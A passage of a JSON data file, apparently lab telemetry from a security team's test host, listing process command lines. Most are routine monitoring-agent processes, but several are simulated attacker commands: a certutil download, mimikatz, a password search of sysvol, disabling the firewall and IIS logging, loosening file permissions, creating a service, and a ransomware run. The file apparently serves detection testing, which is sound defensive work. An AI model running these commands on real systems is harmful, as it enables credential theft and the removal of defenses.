\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"M